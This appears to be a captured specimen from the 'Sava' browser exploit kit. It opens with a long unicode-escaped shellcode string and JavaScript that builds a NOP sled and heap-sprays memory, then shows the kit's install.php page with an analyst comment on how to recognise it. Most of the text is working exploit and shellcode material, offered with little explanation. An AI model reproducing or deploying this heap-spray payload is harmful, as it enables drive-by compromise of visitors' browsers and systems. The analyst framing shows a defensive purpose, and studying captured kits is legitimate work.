33%u3333%u7525%u3733%u3333%u7525%u3537%u3532%u7525%u3833%u3333%u7525%u3633%u3333%u7525%u3537%u3532%u7525%u3533%u3733%u7525%u3533%u3233%u7525%u3537%u3532%u7525%u3033%u3333%u7525%u3733%u3333%u7525%u3537%u3532%u7525%u3433%u3333%u7525%u3733%u3333%u7525%u3537%u3532%u7525%u3533%u3733%u7525%u3533%u3233%u7525%u3537%u3532%u7525%u3633%u3433%u7525%u3233%u3333%u7525%u3537%u3532%u7525%u3133%u3433%u7525%u3333%u3333%u7525%u3537%u3532%u7525%u3533%u3733%u7525%u3533%u3233%u7525%u3537%u3532%u7525%u3433%u3333%u7525%u3333%u3333%u7525%u3537%u3532%u7525%u3633%u3433%u7525%u3233%u3333%u7525%u3537%u3532%u7525%u3533%u3733%u7525%u3533%u3233%u7525%u3537%u3532%u7525%u3633%u3333%u7525%u3633%u3333%u7525%u3537%u3532%u7525%u3533%u3433%u7525%u3233%u3333%u7525%u3537%u3532%u7525%u3533%u3733%u7525%u3533%u3233%u7525%u3537%u3532%u7525%u3333%u3333%u7525%u3633%u3333%u7525%u3537%u3532%u7525%u3133%u3333%u7525%u3633%u3333%u7525%u3537%u3532%u7525%u3533%u3733%u7525%u3533%u3233%u7525%u3537%u3532%u7525%u3233%u3333%u7525%u3633%u3333%u7525%u3537%u3532%u7525%u3533%u3333%u7525%u3633%u3333%u7525%u3537%u3532%u7525%u3533%u3733%u7525%u3533%u3233%u7525%u3537%u3532%u7525%u3633%u3433%u7525%u3633%u3333%u7525%u3537%u3532%u7525%u3633%u3433%u7525%u3633%u3333%u7525%u3537%u3532%u7525%u3533%u3733%u7525%u3533%u3233%u7525%u3537%u3532%u7525%u3433%u3433%u7525%u3233%u3333%u7525%u3537%u3532%u7525%u3233%u3433%u7525%u3633%u3333%u7525%u3537%u3532%u7525%u3533%u3733%u7525%u3533%u3233%u7525%u3537%u3532%u7525%u3033%u3333%u7525%u3733%u3333%u7525%u3537%u3532%u7525%u3133%u3333%u7525%u3633%u3333%u7525%u3537%u3532%u7525%u3533%u3733%u7525%u3533%u3233%u7525%u3537%u3532%u7525%u3333%u3333%u7525%u3733%u3333%u7525%u3537%u3532%u7525%u3033%u3333%u7525%u3733%u3333%u7525%u3537%u3532%u7525%u3533%u3733%u7525%u3533%u3233%u7525%u3537%u3532%u7525%u3433%u3433%u7525%u3633%u3333%u7525%u3537%u3532%u7525%u3533%u3433%u7525%u3233%u3333%u7525%u3537%u3532%u7525%u3533%u3733%u7525%u3533%u3233%u7525%u3537%u3532%u7525%u3633%u3433%u7525%u3233%u3333%u7525%u3537%u3532%u7525%u3533
%u3333%u7525%u3633%u3333%u7525%u3537%u3532%u7525%u3533%u3733%u7525%u3533%u3233%u7525%u3537%u3532%u7525%u3133%u3333%u7525%u3633%u3333%u7525%u3537%u3532%u7525%u3033%u3333%u7525%u3733%u3333%u7525%u3537%u3532%u7525%u3533%u3733%u7525%u3533%u3233%u7525%u3537%u3532%u7525%u3533%u3333%u7525%u3633%u3333%u7525%u3537%u3532%u7525%u3533%u3433%u7525%u3633%u3333%u7525%u3537%u3532%u7525%u3533%u3733%u7525%u3533%u3233%u7525%u3537%u3532%u7525%u3633%u3433%u7525%u3233%u3333%u7525%u3537%u3532%u7525%u3333%u3433%u7525%u3633%u3333%u7525%u3537%u3532%u7525%u3533%u3733%u7525%u3533%u3233%u7525%u3537%u3532%u7525%u3633%u3433%u7525%u3633%u3333%u7525%u3537%u3532%u7525%u3333%u3433%u7525%u3633%u3333%u7525%u3537%u3532%u7525%u3533%u3733%u7525%u3533%u3233%u7525%u3537%u3532%u7525%u3433%u3333%u7525%u3633%u3333%u7525%u3537%u3532%u7525%u3133%u3333%u7525%u3633%u3333%u7525%u3537%u3532%u7525%u3533%u3733%u7525%u3533%u3233%u7525%u3537%u3532%u7525%u3033%u3333%u7525%u3733%u3333%u7525%u3537%u3532%u7525%u3533%u3433%u7525%u3233%u3333%u7525%u3537%u3532%u7525%u3533%u3733%u7525%u3533%u3233%u7525%u3537%u3532%u7525%u3033%u3333%u7525%u3733%u3333%u7525%u3537%u3532%u7525%u3833%u3333%u7525%u3633%u3333%u9000');
                     
     nops=unescape('%u0a0a%u0a0a');
     headersize =20;
     slackspace= headersize + shellcode.length;
     while(nops.length< slackspace) nops+= nops;
     fillblock= nops.substring(0, slackspace);
     block= nops.substring(0, nops.length- slackspace);
     while( block.length+ slackspace<0x200000) block= block+ block+ fillblock;
     memory=new Array();
     for( counter=0; counter<200; counter++) memory[counter]= block + shellcode;     
</script>
</body></div></html>

install.php

<!--
  Analyst note (captured specimen, kept verbatim).
  Static head of the kit's install.php page as posted; the listing starts at
  the title element, without a doctype or opening html/head tags. The title
  text and the relative stylesheet import i/index.css are fixed strings in this
  page and can be used to recognise an exposed installer in web content or
  proxy logs. The conditional comments below only adjust styling for old
  Internet Explorer versions and carry no script.
-->
<title>.:: Sava Free Pack ::.</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<style type="text/css">
<!--
@import url("i/index.css");
-->
</style>
<!--[if IE]>
<style type="text/css">
p.note-general, p.note-warning { color: #666666; }
</style>
<![endif]-->
<!--[if IE 6]>
<style type="text/css">
#footer { height: 1em; }
</style>
<![endif]-->
<!--[if IE 5.5]>
<style type="text/css">
pre { width: 453px; }
</style>
<![endif]-->
</head>
<body id="gordonmac-com" class="homepage">
<div id="wrapper-a">
  <div id="wrapper-b">
    <div id="heading">
      <h1><a href="#">Exploit PAck</a></h1>
      <h2>Exploit pack</h2>

      <p id="heading-intro">Sava Exp PACK install...</p>
     
      <ul id="nav-a">


      </ul>
    </div>
    <div id="content">
      <div id="content-a">
        <div id="content-a-inner">
          <center>
  <br>  
Ruining the bad guy's day